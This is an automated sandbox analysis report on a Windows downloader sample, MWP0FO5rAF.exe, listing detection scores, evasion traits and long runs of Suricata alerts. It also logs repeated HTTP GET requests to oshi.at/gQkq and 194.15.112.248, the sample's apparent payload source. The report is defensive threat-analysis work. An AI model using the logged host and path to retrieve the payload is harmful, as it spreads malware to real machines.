Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MWP0FO5rAF.exe

Overview

General Information

Sample name:MWP0FO5rAF.exe
renamed because original name is a hash value
Original sample name:f55861fdfab03622d2e522711b19b3edfa6d50906ab712cfae0810639205b0ce.exe
Analysis ID:1587871
MD5:79e059e518b08adbf428180b3e05495e
SHA1:53dec3a16758aeb96a1afce4245b26c56d53d40a
SHA256:f55861fdfab03622d2e522711b19b3edfa6d50906ab712cfae0810639205b0ce
Tags:exeuser-adrian__luca
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Machine Learning detection for sample
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64
  • MWP0FO5rAF.exe (PID: 7596 cmdline: "C:\Users\user\Desktop\MWP0FO5rAF.exe" MD5: 79E059E518B08ADBF428180B3E05495E)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
MWP0FO5rAF.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    0.0.MWP0FO5rAF.exe.370000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-10T18:56:45.262942+010028033053Unknown Traffic192.168.2.949756194.15.112.248443TCP
      2025-01-10T18:56:47.750226+010028033053Unknown Traffic192.168.2.949768194.15.112.248443TCP
      2025-01-10T18:56:49.563677+010028033053Unknown Traffic192.168.2.949782194.15.112.248443TCP
      2025-01-10T18:56:51.472596+010028033053Unknown Traffic192.168.2.949793194.15.112.248443TCP
      2025-01-10T18:56:54.066444+010028033053Unknown Traffic192.168.2.949804194.15.112.248443TCP
      2025-01-10T18:57:04.976537+010028033053Unknown Traffic192.168.2.949818194.15.112.248443TCP
      2025-01-10T18:57:07.198274+010028033053Unknown Traffic192.168.2.949870194.15.112.248443TCP
      2025-01-10T18:57:09.070685+010028033053Unknown Traffic192.168.2.949882194.15.112.248443TCP
      2025-01-10T18:57:14.387559+010028033053Unknown Traffic192.168.2.949890194.15.112.248443TCP
      2025-01-10T18:57:16.475156+010028033053Unknown Traffic192.168.2.949918194.15.112.248443TCP
      2025-01-10T18:57:18.321316+010028033053Unknown Traffic192.168.2.949929194.15.112.248443TCP
      2025-01-10T18:57:20.678591+010028033053Unknown Traffic192.168.2.949940194.15.112.248443TCP
      2025-01-10T18:57:23.008507+010028033053Unknown Traffic192.168.2.949956194.15.112.248443TCP
      2025-01-10T18:57:26.260261+010028033053Unknown Traffic192.168.2.949969194.15.112.248443TCP
      2025-01-10T18:57:28.212441+010028033053Unknown Traffic192.168.2.949987194.15.112.248443TCP
      2025-01-10T18:57:30.055033+010028033053Unknown Traffic192.168.2.949994194.15.112.248443TCP
      2025-01-10T18:57:31.880936+010028033053Unknown Traffic192.168.2.949995194.15.112.248443TCP
      2025-01-10T18:57:33.707657+010028033053Unknown Traffic192.168.2.949996194.15.112.248443TCP
      2025-01-10T18:57:35.545267+010028033053Unknown Traffic192.168.2.949998194.15.112.248443TCP
      2025-01-10T18:57:37.368038+010028033053Unknown Traffic192.168.2.949999194.15.112.248443TCP
      2025-01-10T18:57:39.204465+010028033053Unknown Traffic192.168.2.950000194.15.112.248443TCP
      2025-01-10T18:57:41.155816+010028033053Unknown Traffic192.168.2.950001194.15.112.248443TCP
      2025-01-10T18:57:42.991357+010028033053Unknown Traffic192.168.2.950002194.15.112.248443TCP
      2025-01-10T18:57:47.943872+010028033053Unknown Traffic192.168.2.950003194.15.112.248443TCP
      2025-01-10T18:57:49.763923+010028033053Unknown Traffic192.168.2.950004194.15.112.248443TCP
      2025-01-10T18:57:51.709021+010028033053Unknown Traffic192.168.2.950005194.15.112.248443TCP
      2025-01-10T18:57:54.004270+010028033053Unknown Traffic192.168.2.950006194.15.112.248443TCP
      2025-01-10T18:57:56.279079+010028033053Unknown Traffic192.168.2.950007194.15.112.248443TCP
      2025-01-10T18:57:58.182221+010028033053Unknown Traffic192.168.2.950008194.15.112.248443TCP
      2025-01-10T18:58:03.357723+010028033053Unknown Traffic192.168.2.950009194.15.112.248443TCP
      2025-01-10T18:58:05.352484+010028033053Unknown Traffic192.168.2.950010194.15.112.248443TCP
      2025-01-10T18:58:08.400228+010028033053Unknown Traffic192.168.2.950011194.15.112.248443TCP
      2025-01-10T18:58:11.363145+010028033053Unknown Traffic192.168.2.950012194.15.112.248443TCP
      2025-01-10T18:58:13.298190+010028033053Unknown Traffic192.168.2.950013194.15.112.248443TCP
      2025-01-10T18:58:15.369583+010028033053Unknown Traffic192.168.2.950014194.15.112.248443TCP
      2025-01-10T18:58:17.259067+010028033053Unknown Traffic192.168.2.950015194.15.112.248443TCP
      2025-01-10T18:58:19.820500+010028033053Unknown Traffic192.168.2.950016194.15.112.248443TCP
      2025-01-10T18:58:21.892570+010028033053Unknown Traffic192.168.2.950017194.15.112.248443TCP
      2025-01-10T18:58:23.831966+010028033053Unknown Traffic192.168.2.950018194.15.112.248443TCP
      2025-01-10T18:58:26.700254+010028033053Unknown Traffic192.168.2.950019194.15.112.248443TCP
      2025-01-10T18:58:28.806028+010028033053Unknown Traffic192.168.2.950020194.15.112.248443TCP
      2025-01-10T18:58:30.761381+010028033053Unknown Traffic192.168.2.950021194.15.112.248443TCP
      2025-01-10T18:58:35.672634+010028033053Unknown Traffic192.168.2.950022194.15.112.248443TCP
      2025-01-10T18:58:37.672175+010028033053Unknown Traffic192.168.2.950023194.15.112.248443TCP
      2025-01-10T18:58:40.462595+010028033053Unknown Traffic192.168.2.950024194.15.112.248443TCP
      2025-01-10T18:58:42.473049+010028033053Unknown Traffic192.168.2.950025194.15.112.248443TCP
      2025-01-10T18:58:44.761698+010028033053Unknown Traffic192.168.2.950026194.15.112.248443TCP
      2025-01-10T18:58:46.559473+010028033053Unknown Traffic192.168.2.950027194.15.112.248443TCP
      2025-01-10T18:58:48.936705+010028033053Unknown Traffic192.168.2.950028194.15.112.248443TCP
      2025-01-10T18:58:51.239069+010028033053Unknown Traffic192.168.2.950029194.15.112.248443TCP
      2025-01-10T18:58:52.997735+010028033053Unknown Traffic192.168.2.950030194.15.112.248443TCP
      2025-01-10T18:58:54.802096+010028033053Unknown Traffic192.168.2.950031194.15.112.248443TCP
      2025-01-10T18:58:56.547736+010028033053Unknown Traffic192.168.2.950032194.15.112.248443TCP
      2025-01-10T18:58:59.233948+010028033053Unknown Traffic192.168.2.950033194.15.112.248443TCP
      2025-01-10T18:59:01.075346+010028033053Unknown Traffic192.168.2.950034194.15.112.248443TCP
      2025-01-10T18:59:04.968882+010028033053Unknown Traffic192.168.2.950035194.15.112.248443TCP
      2025-01-10T18:59:06.742406+010028033053Unknown Traffic192.168.2.950036194.15.112.248443TCP
      2025-01-10T18:59:08.519975+010028033053Unknown Traffic192.168.2.950037194.15.112.248443TCP
      2025-01-10T18:59:10.285871+010028033053Unknown Traffic192.168.2.950038194.15.112.248443TCP
      2025-01-10T18:59:15.112614+010028033053Unknown Traffic192.168.2.950039194.15.112.248443TCP
      2025-01-10T18:59:16.869776+010028033053Unknown Traffic192.168.2.950040194.15.112.248443TCP
      2025-01-10T18:59:18.744880+010028033053Unknown Traffic192.168.2.950041194.15.112.248443TCP
      2025-01-10T18:59:20.555289+010028033053Unknown Traffic192.168.2.950042194.15.112.248443TCP
      2025-01-10T18:59:22.282448+010028033053Unknown Traffic192.168.2.950043194.15.112.248443TCP
      2025-01-10T18:59:24.055772+010028033053Unknown Traffic192.168.2.950044194.15.112.248443TCP
      2025-01-10T18:59:26.034374+010028033053Unknown Traffic192.168.2.950045194.15.112.248443TCP
      2025-01-10T18:59:28.936967+010028033053Unknown Traffic192.168.2.950046194.15.112.248443TCP
      2025-01-10T18:59:30.692547+010028033053Unknown Traffic192.168.2.950047194.15.112.248443TCP
      2025-01-10T18:59:32.461967+010028033053Unknown Traffic192.168.2.950048194.15.112.248443TCP
      2025-01-10T18:59:34.373241+010028033053Unknown Traffic192.168.2.950049194.15.112.248443TCP
      2025-01-10T18:59:36.192047+010028033053Unknown Traffic192.168.2.950050194.15.112.248443TCP
      2025-01-10T18:59:38.207078+010028033053Unknown Traffic192.168.2.950051194.15.112.248443TCP
      2025-01-10T18:59:40.094785+010028033053Unknown Traffic192.168.2.950052194.15.112.248443TCP
      2025-01-10T18:59:42.129700+010028033053Unknown Traffic192.168.2.950053194.15.112.248443TCP
      2025-01-10T18:59:43.967484+010028033053Unknown Traffic192.168.2.950054194.15.112.248443TCP
      2025-01-10T18:59:45.905840+010028033053Unknown Traffic192.168.2.950055194.15.112.248443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: MWP0FO5rAF.exeAvira: detected
      Multi AV Scanner detection for submitted file
      Source: MWP0FO5rAF.exeVirustotal: Detection: 73%Perma Link
      Source: MWP0FO5rAF.exeReversingLabs: Detection: 65%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
      Machine Learning detection for sample
      Source: MWP0FO5rAF.exeJoe Sandbox ML: detected
      Source: MWP0FO5rAF.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.9:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.9:50019 version: TLS 1.2
      Source: MWP0FO5rAF.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Networking

      barindex
      Yara detected Generic Downloader
      Source: Yara matchFile source: MWP0FO5rAF.exe, type: SAMPLE
      Source: Yara matchFile source: 0.0.MWP0FO5rAF.exe.370000.0.unpack, type: UNPACKEDPE
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.atConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: Joe Sandbox ViewIP Address: 194.15.112.248 194.15.112.248
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49756 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49768 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49793 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49890 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49804 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49999 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50004 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50009 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50017 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49996 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50031 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50029 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50038 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49818 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50037 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50019 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50012 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50043 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50054 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50039 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50014 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50048 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49870 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49782 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49882 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49918 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50028 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49998 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50052 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49994 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50018 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50008 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49969 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50002 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50003 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50005 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50041 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50035 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50015 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50021 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50034 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50051 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50013 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49956 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50053 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50042 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50050 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49995 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50010 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50055 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50027 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50006 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50000 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49940 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50011 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50032 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50026 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50016 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50001 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50033 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50046 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50040 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50020 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50036 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50024 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49987 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50007 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50023 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50030 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50045 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50025 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50044 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49929 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50049 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50022 -> 194.15.112.248:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:50047 -> 194.15.112.248:443
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.atConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
